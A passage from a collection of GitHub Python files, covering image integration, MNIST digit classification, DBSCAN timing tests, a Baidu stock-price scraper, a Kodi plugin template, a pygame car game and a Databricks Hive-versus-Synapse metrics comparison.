333224\ntiffInitial = '/media/heliu/Seagate Backup Plus Drive/krause_jul19/nf/s1350_100_1_nf/s1350_100_1_nf_'\ndigit = 6\nextention = '.tif'\nNInt = 4 # integrate 4 images into 1.\nNImage = 4 # 1440*22 # number of images before integration\noutInitial = '/media/heliu/Seagate Backup Plus Drive/krause_jul19/nf/s1350_100_1_nf/s1350_100_1_nf_int4_'\noutStartIdx = 0 # starting index of output image\n\nreduction.integrate_tiff(tiffInitial, startIdx, digit, extention, NImage, NInt,outInitial, outStartIdx)","repo_name":"HeLiuCMU/HEXOMAP","sub_path":"scripts/int_tiff.py","file_name":"int_tiff.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"1541731345","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nimport os\r\n\r\ndf_test = pd.read_csv('test.csv')\r\ndf_test_values = df_test.values\r\n\r\ndf_train = pd.read_csv('train.csv')\r\ndf_train_values = df_train.values\r\n\r\nans = pd.read_csv('sample_submission.csv')\r\n\r\nx_train = df_train_values[:,1:]\r\ny_train = df_train_values[:,0]\r\n\r\n\r\nDT_C = RandomForestClassifier()\r\nDT_C.fit(x_train,y_train)\r\n\r\ny_pred = DT_C.predict(df_test_values)\r\ny_pred = pd.Series(y_pred)\r\n#draw:\r\n\r\nfig,ax1 = plt.subplots(1)\r\nax1.imshow((df_test_values[5].reshape(28,28)),cmap='gray')\r\nplt.show()\r\n\r\n'''\r\ntest1 = pd.DataFrame([[23,5],[2,5],[15,78],[0,6]],\r\n columns = ['hello','yo'])\r\ntest2 = pd.Series([11])\r\n\r\ntest3 = test1.join(test2.rename('yo1'),how= 'left')\r\n''' \r\nans = ans.drop(columns='Label',axis = 1 )\r\nans = ans.join(y_pred.rename('Label'))\r\n\r\nans.to_csv('submission_RF.csv',index= False)\r\n\r\n'''\r\nUsing Keras CNN\r\n\r\n'''\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, MaxPool2D\r\nfrom keras.layers import Conv2D\r\nfrom sklearn.model_selection import train_test_split\r\nimport numpy as np\r\nfrom keras.utils import to_categorical\r\n#x_train = x_train.reshape(42000,28,28,1)\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n x_train, y_train, test_size=0.2, random_state=0)\r\n\r\nX_train = X_train.reshape(33600,28,28,1)\r\nX_test = X_test.reshape(8400,28,28,1)\r\ny_train1 = np.array(y_train)\r\ny_test1 = np.array(y_test)\r\n\r\n'''\r\n# Transfer,for example as y_train(28140,) to (28140,10)\r\n# [8] = [0,0,0,0,0,0,0,0,1,0]\r\n\r\n'''\r\ny_train1 = to_categorical(y_train)\r\ny_test1 = to_categorical(y_test)\r\n\r\ncnn = Sequential()\r\ncnn.add(Conv2D(32,kernel_size =(3,3),\r\n activation = 'relu',\r\n input_shape=(28,28,1)))\r\ncnn.add(Dropout(0.25))\r\ncnn.add(Conv2D(32,(3,3),activation='relu'))\r\ncnn.add(Dropout(0.25))\r\ncnn.add(Conv2D(32,(3,3),activation='relu'))\r\ncnn.add(MaxPool2D(pool_size=(2,2)))#pooling layer\r\n\r\ncnn.add(Flatten())\r\ncnn.add(Dense(512,activation='relu'))\r\ncnn.add(Dense(256,activation='relu')) #fully connected layer\r\ncnn.add(Dropout(0.5))\r\ncnn.add(Dense(units=10,activation='softmax')) #output layer\r\n\r\ncnn.compile(loss='categorical_crossentropy',\r\n optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\ncnn.fit(X_train,y_train1,\r\n batch_size=128,\r\n epochs = 10,\r\n validation_data=(X_test,y_test1))\r\n\r\n\r\ncnn.summary()\r\nAccuracy = cnn.evaluate(X_test, y_test1,verbose = 0)\r\nprint(\"Accuracy_CNN: \" ,Accuracy)\r\n\r\ndf_test_values_transform = df_test_values.reshape(-1,28,28,1)\r\n\r\n#predict the test\r\nresults = 
cnn.predict(df_test_values_transform)\r\nresults = np.argmax(results, axis=1)\r\nresults = pd.Series(results)\r\nans = ans.drop(columns = ['Label'])\r\nans = ans.join(results.rename('Label'))\r\n\r\nans.to_csv('submission.csv',index = False)\r\n\r\n\r\n\r\n\r\n","repo_name":"maxgood019/Machine_learning","sub_path":"Digit Recognition/Digit-recognizer.py","file_name":"Digit-recognizer.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22515741978","text":"#!/usr/bin/env python3\n\"\"\"\nClusterization of LD matrices with dbscan and hdbscan\nAuthor: Nikita Sapozhnikov, nikita.sapozhnikov1@gmail.com\nDate: November 02, 2023\nsnp_clustering for CPU time tests\n\"\"\"\n\nimport time\nimport os\nimport sys\nimport resource\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nimport h5py\n\n\nEPS = np.linspace(0.05, 1, 20)\nMIN_SAMPLES = np.arange(2, 20, 1)\n\n\ndef get_memory_usage():\n    \"\"\"\n    get memory utilization\n    \"\"\"\n    usage = resource.getrusage(resource.RUSAGE_SELF)\n    return (usage.ru_maxrss / 1024.0)  # Convert to kilobytes\n\n\ndef prepare_data() -> np.ndarray:\n    \"\"\"\n    data preparation function\n    \"\"\"\n    matrix_file_path = os.path.join('data', 'chr3-1.ld.h5')\n    try:\n        print('Opening matrix file...')\n        with h5py.File(matrix_file_path, 'r') as corr_file:\n            dset = corr_file['r2']\n            ld_matrix = dset['block0_values']\n            corr_matrix = np.array(ld_matrix)\n    except FileNotFoundError:\n        sys.exit('Invalid matrix file path.')\n\n    np.nan_to_num(corr_matrix, copy=False)\n    np.abs(corr_matrix, out=corr_matrix)\n    corr_matrix = 1 - corr_matrix\n    np.fill_diagonal(corr_matrix, 0)\n    print(corr_matrix)\n    print(f\"Memory usage: {get_memory_usage():.2f} KB\")\n    return corr_matrix\n\n\ndef dbscan_clustering(diss_matrix: np.ndarray,\n                      eps: float,\n                      min_samples: int) -> float:\n    \"\"\"\n    perform a dbscan clustering\n    \"\"\"\n    time_start = time.time()\n    DBSCAN(eps=eps,\n           min_samples=min_samples,\n           metric='precomputed',\n           n_jobs=-1).fit(diss_matrix)\n    time_end = time.time()\n    clusterization_time = time_end - time_start\n    print('Time of clustering: ', clusterization_time)\n    print(f\"Memory usage: {get_memory_usage():.2f} KB\")\n    return clusterization_time\n\n\nif __name__ == '__main__':\n    time_list = []\n    matrix = prepare_data()\n    for eps_ in EPS:\n        for min_samples_ in MIN_SAMPLES:\n            print(f'Parameters pair:\\neps:\\t{eps_}\\nmin_samples:\\t{min_samples_}')\n            iter_time = dbscan_clustering(diss_matrix=matrix,\n                                          eps=eps_,\n                                          min_samples=min_samples_)\n            time_list.append(iter_time)\n    print('Total time is: ', sum(time_list))\n    mean = np.mean(time_list)\n    print(f'Mean for eps = {eps_}:', mean)\n\n    median = np.median(time_list)\n    print(f'Median for eps = {eps_}:', median)\n    # ddof=1 for sample standard deviation\n    std_dev = np.std(time_list, ddof=1)\n    print(f'Standard Deviation for eps = {eps_}:', std_dev)\n","repo_name":"NSapozhnikov/CPU_test","sub_path":"snp_clustering_cpu_test.py","file_name":"snp_clustering_cpu_test.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"28555709426","text":"import requests\nimport traceback,json,datetime,time\nfrom time import strftime, localtime\n\n \nclass stock(object):\n\n    def __init__(self, urlList, mess, vmUrl, historyfiveDayUrlList, vmUrlExp):\n        self.urlList = urlList\n        self.vmUrl = vmUrl\n        self.historyfiveDayUrlList = historyfiveDayUrlList\n        self.vmUrlExp = 
vmUrlExp\n return\n \n def getAllData(self):\n for i in (self.urlList):\n timeStamp = time.time()\n data = self.getData(i[\"url\"])\n if data == \"\":\n break\n #stock_baidu{location=\"us\",name=\"baidu\",type=\"now\"}\n vmStr = 'stock,type=now,name=%s,location=%s baidu=%s' \\\n % (i[\"name\"], i[\"location\"], data['Result'][0]['TplData']['result']['price'] )\n print(vmStr, datetime.datetime.now())\n self.sendDataToVm(self.vmUrl, vmStr)\n \n return vmStr\n \n def getData(self, url):\n try:\n \n payload=''\n headers = {\n 'Content-Type': 'application/json'\n }\n #print(urlIneed, payload, headers)\n resp = requests.post(url, data=payload, headers=headers) \n #if resp.status_code != 200 and retry > 0 : \n #self.tigger_ineed()\n #print(idc +' ' + appid + \" error : \" + str(r.content) + ' get ins_list error , please manunal check' )\n #return\n str1=str(resp.content, encoding = \"utf-8\")\n data=json.loads(str1)\n #print(\"all insList len is \", len(data), \" \",data) \n\n \n return data\n except Exception as e:\n print(traceback.print_exc())\n return \"\"\n \n def sendDataToVm(self, url, data):\n payload=data\n headers = {\n 'Content-Type': 'text'\n }\n #print(urlIneed, payload, headers)\n resp = requests.post(url, data=payload, headers=headers) \n str1=str(resp.content, encoding = \"utf-8\")\n \n print(str1)\n\n def getHistoryData(self):\n for i in (self.historyfiveDayUrlList):\n timeStamp = time.time()\n data = self.getData(i[\"url\"])\n if data == \"\":\n break\n vmStr=\"\"\n for d in data[\"Result\"][\"fivedays\"]:\n print(d)\n for dPont in d[\"priceinfos\"]:\n print(dPont)\n #stock{type=\"fiveDay\"}\n vmStr += 'stock{type=\"fiveDay\",name=\"%s\",location=\"%s\"} %s %s\\n' \\\n % (i[\"name\"], i[\"location\"], dPont[\"price\"], dPont[\"time\"])\n print(vmStr)\n self.sendDataToVm(self.vmUrlExp, vmStr)\n\ndef isFriday():\n now_time = strftime(\"%H:%M:%S\", localtime())\n print(now_time)\n if localtime().tm_wday == 4 and now_time == \"17:00:00\":\n return True\n return False\n \n\nif __name__ == '__main__':\n\n\n urlList = [{\"url\":\"http://finance.pae.baidu.com/vapi/stockshort?code=09888&market=hk&finClientType=pc\",\"name\":\"baidu\",\"location\":\"hk\"}, \n {\"url\":\"https://finance.pae.baidu.com/vapi/stockshort?code=BIDU&market=us&finClientType=pc\",\"name\":\"baidu\",\"location\":\"us\"}]\n historyfiveDayUrlList = [{\"url\":\"https://finance.pae.baidu.com/selfselect/getstockquotation?code=09888&all=1&ktype=1&isIndex=false&isBk=false&isBlock=false&isFutures=false&stockType=hk&group=quotation_fiveday_hk&finClientType=pc\",\"name\":\"baidu\",\"location\":\"hk\"},\n {\"url\":\"https://finance.pae.baidu.com/selfselect/getstockquotation?code=BIDU&all=1&ktype=1&isIndex=false&isBk=false&isBlock=false&isFutures=false&stockType=us&group=quotation_fiveday_us&finClientType=pc\",\"name\":\"baidu\",\"location\":\"us\"}]\n task = stock(urlList, \"\", 'http://localhost:8428/write', historyfiveDayUrlList, \"http://localhost:8428/api/v1/import/prometheus\")\n task.getAllData()\n if isFriday() :\n task.getHistoryData()\n\n while True:\n task.getAllData()\n time.sleep(1)\n\n","repo_name":"whatattitude/stock-quantization","sub_path":"craw.py","file_name":"craw.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11665801988","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n SPDX-License-Identifier: Unlicense\n See LICENSES/Unlicense for more information.\n\"\"\"\n\ntry:\n from kodi_six import xbmc\n from 
kodi_six import xbmcaddon\n    from kodi_six import xbmcgui\n    from kodi_six import xbmcplugin\n    from kodi_six import xbmcvfs\n    from kodi_six.utils import *\nexcept ImportError:\n    import xbmc\n    import xbmcaddon\n    import xbmcgui\n    import xbmcplugin\n    import xbmcvfs\n\nimport routing\n\nplugin = routing.Plugin()\naddon = xbmcaddon.Addon(id='plugin.script.testing')\n\n\n@plugin.route('/')\ndef main():\n    \"\"\"\n    Plugin path: plugin://plugin.script.testing/\n\n    Create a menu item for each testable item type\n\n    - Folder\n    - Playable Item\n    - Unplayable Item\n    \"\"\"\n\n    def create_menu_item(label, route, is_folder, is_playable):\n        item = xbmcgui.ListItem(label=label)\n\n        if isinstance(is_playable, bool):\n            item.setProperty(key='IsPlayable', value=str(is_playable).lower())\n            if is_playable:\n                item.setInfo('video', {'title': label})\n\n        xbmcplugin.addDirectoryItem(handle=plugin.handle, url=plugin.url_for(func=route),\n                                    listitem=item, isFolder=is_folder)\n\n    # plugin://plugin.script.testing/folder\n    # label: Folder\n    create_menu_item(label=addon.getLocalizedString(30010), route=folder, is_folder=True,\n                     is_playable=None)\n\n    # plugin://plugin.script.testing/play\n    # label: Playable Item\n    create_menu_item(label=addon.getLocalizedString(30011), route=play, is_folder=False,\n                     is_playable=True)\n\n    # plugin://plugin.script.testing/action\n    # label: Unplayable Item\n    create_menu_item(label=addon.getLocalizedString(30012), route=action, is_folder=False,\n                     is_playable=False)\n\n    xbmcplugin.endOfDirectory(handle=plugin.handle, succeeded=True, cacheToDisc=False)\n\n\n@plugin.route('/folder')\ndef folder():\n    \"\"\"\n    Plugin path: plugin://plugin.script.testing/folder\n\n    \"Folder\" menu item endpoint\n    \"\"\"\n\n    # -- add code --\n\n    xbmcplugin.endOfDirectory(handle=plugin.handle, succeeded=True, cacheToDisc=False)\n\n\n@plugin.route('/play')\ndef play():\n    \"\"\"\n    Plugin path: plugin://plugin.script.testing/play\n\n    \"Playable Item\" menu item endpoint\n    \"\"\"\n\n    playable_path = ''\n\n    # -- add code --\n\n    list_item = xbmcgui.ListItem(label=addon.getLocalizedString(30011))  # label: Playable Item\n    list_item.setProperty(key='IsPlayable', value='true')\n    list_item.setInfo('video', {'title': addon.getLocalizedString(30011)})\n    list_item.setPath(path=playable_path)\n\n    # -- add code --\n\n    xbmcplugin.setResolvedUrl(handle=plugin.handle, succeeded=True, listitem=list_item)\n\n\n@plugin.route('/action')\ndef action():\n    \"\"\"\n    Plugin path: plugin://plugin.script.testing/action\n\n    \"Unplayable Item\" menu item endpoint\n    \"\"\"\n\n    # -- add code --\n\n    pass\n\n\nif __name__ == '__main__':\n    plugin.run()\n","repo_name":"anxdpanic/plugin.script.testing","sub_path":"resources/lib/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"36702818184","text":"#Libraries\nimport pygame,sys\nfrom pygame.locals import *\nfrom pygame import mixer\nimport random\nfrom pygame.sprite import Group\npygame.init()\n\n#Background colors\ngray=(100,100,100)\ngreen=(76,208,56)\nyellow=(255,232,0)\nred=(200,0,0)\nwhite=(255,255,255)\nblack=(0,0,0)\n\n#Create the game window\nwidth=500\nheight=500\nscreen_size=(width,height)\nscreen=pygame.display.set_mode(screen_size)\npygame.display.set_caption(\"Xe Vượt Chướng Ngại Vật\")\n\n#Play background music when the game starts\npygame.mixer.music.load('music/BackgroundMusic.wav')\nmixer.music.play()\n\n#Initialize variables\ngameover=False\nspeed=2\nscore=0\nkmh=40 #Km/h\n\n#The road and 
lane markings\nroad_width=300\nstreet_width=10\nstreet_height=50\n\n#Road lanes\nlane_left=150\nlane_center=250\nlane_right=350\nlanes=[lane_left,lane_center,lane_right]\nlane_move_Y=0\n\n#Road surface and road edges\nroad=(100,0,road_width,height)\nleft_edge=(95,0,street_width,height)\nright_edge=(395,0,street_width,height)\n\n#Player's starting position\nplayer_x=250\nplayer_y=400\n\n#Traffic vehicle class\nclass Vehicle(pygame.sprite.Sprite):\n    def __init__(self, image,x,y):\n        pygame.sprite.Sprite.__init__(self)\n\n        #Scale the image to fit (pygame.transform.scale expects integer sizes)\n        image_scale= 45 / image.get_rect().width\n        new_width= int(image.get_rect().width * image_scale)\n        new_height=int(image.get_rect().height*image_scale)\n        self.image=pygame.transform.scale(image,(new_width,new_height))\n        self.rect=self.image.get_rect()\n        self.rect.center=(x,y)\n\n#Load the traffic vehicle images\nimage_name=['pickup_truck.png','semi_trailer.png','taxi.png','van.png']\nVehicle_image=[]\nfor name in image_name:\n    image=pygame.image.load('images/'+name)\n    Vehicle_image.append(image)\n\n#Sprite groups\nplayer_group = pygame.sprite.Group()\nvehicle_group=pygame.sprite.Group()\n\n#Player vehicle class\nclass Player_vehicle(Vehicle):\n    def __init__(self,x,y):\n        image=pygame.image.load('images/car.png')\n        super().__init__(image,x,y)\n\n#Create the player vehicle\nplayer=Player_vehicle(player_x,player_y)\nplayer_group.add(player)\n\n\n#Load the crash image\ncrash=pygame.image.load('images/crash.png')\ncrash_rect=crash.get_rect()\n\n#Set the frames per second (FPS)\nclock=pygame.time.Clock()\nfps=120\n\n# Create the start/instructions screen\ndef show_start_screen():\n    # Draw the start screen background\n    #Draw the grass\n    screen.fill(green)\n\n    #Draw the road surface\n    pygame.draw.rect(screen,gray,road)\n\n    #Draw the road edges\n    pygame.draw.rect(screen,yellow,left_edge) \n    pygame.draw.rect(screen,yellow,right_edge)\n\n    #Draw the lane markings\n    for y in range(street_height * -2,height,street_height*2):\n        pygame.draw.rect(screen,white,(lane_left + 45,y + lane_move_Y, street_width,street_height))\n        pygame.draw.rect(screen,white,(lane_center + 45,y + lane_move_Y, street_width,street_height))\n\n    #Draw the player vehicle\n    player_group.draw(screen)\n    \n    # Draw the objects, text and images needed on the start screen\n    font=pygame.font.Font(pygame.font.get_default_font(),15)\n    font1=pygame.font.Font(pygame.font.get_default_font(),16) \n    font2=pygame.font.Font(pygame.font.get_default_font(),20)\n    pygame.draw.rect(screen,white,(0,40,width,130))\n    text = font1.render('Press \"Space\" to play', True, white)\n    text_rect = text.get_rect(center=(240,480))\n    ###################################\n    text_guide=font2.render(\"HOW TO PLAY\", True, black)\n    text_guide_rect = text.get_rect(center=(250,60))\n    ###################################\n    text_guide1=font.render(\"Control the vehicle using the left and right keys on the keyboard.\", True, black)\n    text_guide1_rect = text.get_rect(center=(100,90))\n    ###################################\n    text_guide2=font.render(\"Passing traffic cars will give you 1 point.\", True, black)\n    text_guide2_rect = text.get_rect(center=(185,110))\n    ###################################\n    text_guide3=font.render(\"If score divisible by 10 the vehicle's speed will increase.\", True, black)\n    text_guide3_rect = text.get_rect(center=(140,130))\n    ###################################\n    text_guide4=font.render(\"The game will end if there is a collision\", True, black)\n    text_guide4_rect = text.get_rect(center=(185,150))\n    ###################################\n    screen.blit(text, text_rect)\n    screen.blit(text_guide,text_guide_rect)\n    
screen.blit(text_guide1,text_guide1_rect)\n    screen.blit(text_guide2,text_guide2_rect)\n    screen.blit(text_guide3,text_guide3_rect)\n    screen.blit(text_guide4,text_guide4_rect)\n\n\n    # Update the display\n    pygame.display.flip()\n    \n    # Wait for the player to press a key to start the game\n    waiting = True\n    while waiting:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                quit()\n            elif event.type == pygame.KEYDOWN:\n                if event.key==K_SPACE:\n                    waiting = False\n\n# Show the start screen before the game begins\nshow_start_screen()\n\n##Main game loop\nrunning=True\nwhile running:\n    #Limit the frame rate\n    clock.tick(fps)\n    for event in pygame.event.get():\n        if event.type==QUIT:\n            running=False\n\n        #Steer the car\n        if event.type==KEYDOWN:\n            if event.key==K_LEFT and player.rect.center[0]>lane_left:\n                player.rect.x -=100\n            if event.key==K_RIGHT and player.rect.center[0]<lane_right:\n                player.rect.x +=100\n\n    #Check for collisions between the player and the traffic\n    if pygame.sprite.spritecollide(player, vehicle_group, True):\n        gameover = True\n        crash_rect.center = [player.rect.center[0], player.rect.top]\n\n    #Draw the grass\n    screen.fill(green)\n\n    #Draw the road surface\n    pygame.draw.rect(screen,gray,road)\n\n    #Draw the road edges\n    pygame.draw.rect(screen,yellow,left_edge) \n    pygame.draw.rect(screen,yellow,right_edge)\n\n    #Draw the moving lane markings\n    lane_move_Y += speed\n    if lane_move_Y >= street_height * 2:\n        lane_move_Y=0\n    for y in range(street_height * -2,height,street_height*2):\n        pygame.draw.rect(screen,white,(lane_left + 45,y + lane_move_Y, street_width,street_height))\n        pygame.draw.rect(screen,white,(lane_center + 45,y + lane_move_Y, street_width,street_height))\n\n    #Draw the player vehicle\n    player_group.draw(screen)\n\n    #Add traffic vehicles\n    if len(vehicle_group) < 2:\n        add_verhicle= True\n        for verhicle in vehicle_group:\n            if verhicle.rect.top < verhicle.rect.height * 1.5:\n                add_verhicle = False\n        if add_verhicle:\n            lane=random.choice(lanes)\n            image=random.choice(Vehicle_image)\n            verhicle=Vehicle(image,lane,height/-2)\n            vehicle_group.add(verhicle)\n\n    #Move the traffic vehicles\n    for vehicle in vehicle_group:\n        vehicle.rect.y += speed\n\n        #Remove vehicles that have left the screen\n        if vehicle.rect.top >= height:\n            vehicle.kill()\n            score +=1\n\n            #Increase the speed\n            if score > 0 and score % 10 == 0:\n                speed += 1\n                kmh += 10\n\n    #Draw the traffic vehicles\n    vehicle_group.draw(screen)\n\n    #Display the score\n    font=pygame.font.Font(pygame.font.get_default_font(),16)\n    text=font.render('Score: '+str(score),True,white)\n    text_rect=text.get_rect()\n    text_rect.center=(50,40)\n    text_speed=font.render('Speed: '+str(kmh)+' Km/h',True,red)\n    text_speed_rect=text.get_rect()\n    text_speed_rect.center=(220,480)\n    screen.blit(text,text_rect)\n    screen.blit(text_speed,text_speed_rect)\n\n    if gameover:\n        screen.blit(crash,crash_rect)\n        pygame.draw.rect(screen,red,(0,50,width,100))\n        font=pygame.font.Font(pygame.font.get_default_font(),16)\n        text=font.render('Game Over! Play again? 
(Y / N)',True,white)\n        text_rect=text.get_rect()\n        text_rect.center=(width/2,100)\n        screen.blit(text,text_rect)\n\n    pygame.display.update()\n    \n    while gameover:\n        clock.tick(fps)\n        for event in pygame.event.get():\n            if event.type==QUIT:\n                gameover=False\n                running=False\n            if event.type==KEYDOWN:\n                if event.key==K_y:\n                    #reset game\n                    show_start_screen()\n                    gameover=False\n                    score=0\n                    kmh=40\n                    speed=2\n                    vehicle_group.empty()\n                    player.rect.center=[player_x,player_y]\n                    mixer.music.load('music/BackgroundMusic.wav')\n                    mixer.music.play()\n                elif event.key==K_n:\n                    #quit game\n                    gameover=False\n                    running=False\npygame.quit()","repo_name":"AnVinh2811/Game-Racing-Car","sub_path":"GameRacingCar.py","file_name":"GameRacingCar.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"24428590287","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC This notebook will create advanced metrics for a Synapse table and compare them with the Hive metrics\n# MAGIC * Prerequisites:\n# MAGIC   * Hive metrics must be generated (using jupyter hub/Putty notebook)\n# MAGIC   * After passing parameters & running till command 4:\n# MAGIC     * Pass parameters in cmd 3, below are the samples:\n# MAGIC       * Container : dev\n# MAGIC       * DBSchema : kh_dev_published_src_cas_db\n# MAGIC       * PrimaryKey : plan_cd (# primary key for that table)\n# MAGIC       * TableName : plan_needs_mapping (name of the table)\n# MAGIC     * upload the hive metrics file in the file location created in command 4 (container/Test_Validation/Advanced_Statistics/<DBSchema.TableName>/yyyyMMdd/)\n# MAGIC   * Once the above two are done run the entire notebook \n\n# COMMAND ----------\n\n# MAGIC %run ./02_Utilities\n\n# COMMAND ----------\n\n# DBTITLE 1,Pass the parameters value here\ndbutils.widgets.removeAll()\ndbutils.widgets.text(\"DBSchema\",\"\")\ndbutils.widgets.text(\"TableName\",\"\")\ndbutils.widgets.text(\"PrimaryKey\",\"\")\ndbutils.widgets.text(\"ContainerName\",\"\")\n\n\nDBSchema = dbutils.widgets.get(\"DBSchema\")\nTableName = dbutils.widgets.get(\"TableName\")\nPrimaryKey = dbutils.widgets.get(\"PrimaryKey\")\nContainerName = dbutils.widgets.get(\"ContainerName\")\n#DBSchema = 'curated'\n#TableName = 'persistency_eda_lapse_dim'\n#PrimaryKey = 'pol_num'\n#Container = 'dev'\n\n# COMMAND ----------\n\n# DBTITLE 1,Make destination directory before dropping Hive metrics file\ncontainer = ContainerName\nmount_container(container)\ntbl_db = DBSchema\ntbl_nm = TableName\nprim_key = PrimaryKey\nmnt_path = dbfs_mount_path+container\ndate_path = date.today().strftime('%Y%m%d') #yyyy/mm/dd\ndest_path=mnt_path+'/Test_Validation/Advanced_Statistics/'+tbl_db+'.'+tbl_nm+'/'+date_path\ndbutils.fs.mkdirs(dest_path)\n\n# COMMAND ----------\n\n# DBTITLE 1,Create Synapse Dataframe\ntbl_name = tbl_db+'.'+tbl_nm\nsyn_df = synapse_table_df(tbl_name)\n\n# COMMAND ----------\n\ndisplay(syn_df)\n\n# COMMAND ----------\n\n# DBTITLE 1,Compute Synapse Metrics\n#All source metrics\nsyn_primary_key_df = check_primary_key(syn_df,prim_key, tbl_db, tbl_nm)\nsyn_cat_df,syn_num_df, syn_date_df = check_data_types(prim_key, tbl_db, tbl_nm, syn_df)\n\n# COMMAND ----------\n\n# DBTITLE 1,Save Synapse Metrics to ADLS \nsyn_primary_key_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_primary_key.csv',header=True)\nsyn_num_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_num.csv',header=True)\nsyn_cat_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_cat.csv',header=True)\nsyn_date_df.to_csv(\"/dbfs\"+dest_path+'/Synapse_date.csv',header=True)\n\n# COMMAND 
----------\n\n# DBTITLE 1,Fetch Hive Metrics\nsrc_primary_key_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_primary_key.csv').toPandas()\nsrc_cat_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_cat.csv').toPandas()\nsrc_num_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_num.csv').toPandas()\nsrc_date_df = spark.read.option(\"header\",\"true\").option(\"inferSchema\",\"true\").csv(dest_path+'/Hive_date.csv').toPandas()\n\n# COMMAND ----------\n\n# DBTITLE 1,Merge Source Hive and Target Synapse metrics\n#schema_name\ttable_name\tmeasure\tcolumn_value\tfreq\nm_primary = src_primary_key_df.merge(syn_primary_key_df, on=['schema_name','table_name','measure'], how='left', suffixes=['', '_tgt'], indicator=True)\n#schema_name\ttable_name\tcolumn_name\tvariable\tvalue\nm_num = src_num_df.merge(syn_num_df,on=['schema_name','table_name','column_name','variable'],how='left', suffixes=['', '_tgt'], indicator=True)\nm_cat = src_cat_df.merge(syn_cat_df,on=[\"schema_name\",\"table_name\",\"column_name\",\"column_value\"],how='left', suffixes=['', '_tgt'], indicator=True)\nm_date = src_date_df.merge(syn_date_df,on=[\"schema_name\",\"table_name\",\"date_type\",\"column_name\",\"column_value\"],how='left', suffixes=['', '_tgt'], indicator=True)\n\n# COMMAND ----------\n\n# DBTITLE 1,Value Diff and Percentage Diff\nm_primary['value_diff'] = m_primary['freq'].sub(m_primary['freq_tgt'])\nm_primary['%diff'] = percentage_change(m_primary['freq'],m_primary['freq_tgt'])\nm_cat['value_diff'] = m_cat['freq'].sub(m_cat['freq_tgt'],axis=0)\nm_cat['%diff'] = percentage_change(m_cat['freq'],m_cat['freq_tgt'])\nm_num['value_tgt'] = m_num['value_tgt'].astype(float, errors = 'raise')\nm_num['value_diff'] = m_num['value'].sub(m_num['value_tgt'],axis=0)\nm_num['%diff'] = percentage_change(m_num['value'],m_num['value_tgt'])\nm_date['value_diff'] = m_date['freq'].sub(m_date['freq_tgt'],axis=0)\nm_date['%diff'] = percentage_change(m_date['freq'],m_date['freq_tgt'])\n\n# COMMAND ----------\n\n# DBTITLE 1,Compare Synapse vs Hive save to ADLS location\ndbutils.fs.mkdirs(dest_path+'/Diff/')\nm_primary.to_csv(\"/dbfs\"+dest_path+'/Diff/Primary_key_diff.csv',header=True)\nm_num.to_csv(\"/dbfs\"+dest_path+'/Diff/Numeric_col_diff.csv',header=True)\nm_cat.to_csv(\"/dbfs\"+dest_path+'/Diff/Cat_col_diff.csv',header=True)\nm_date.to_csv(\"/dbfs\"+dest_path+'/Diff/Date_col_diff.csv',header=True)\n","repo_name":"navneku/navneku","sub_path":"databricks/Test_Scripts/KH_Migration/TestScripts_(non_automated_version)/Databricks/03.2_Hive_vs_Synapse_Advanced_Statistics.py","file_name":"03.2_Hive_vs_Synapse_Advanced_Statistics.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18103127849","text":"nterms= int(input(\"How many terms ? \"))\r\n\r\nn1=0 ; n2=1\r\ncount=0\r\n\r\nif nterms<0:\r\n    print(\"Enter positive value!\")\r\n\r\nelif nterms==0:\r\n    print(n1)\r\n\r\nelif nterms==1:\r\n    print(n2)\r\n\r\nelse:\r\n    while count
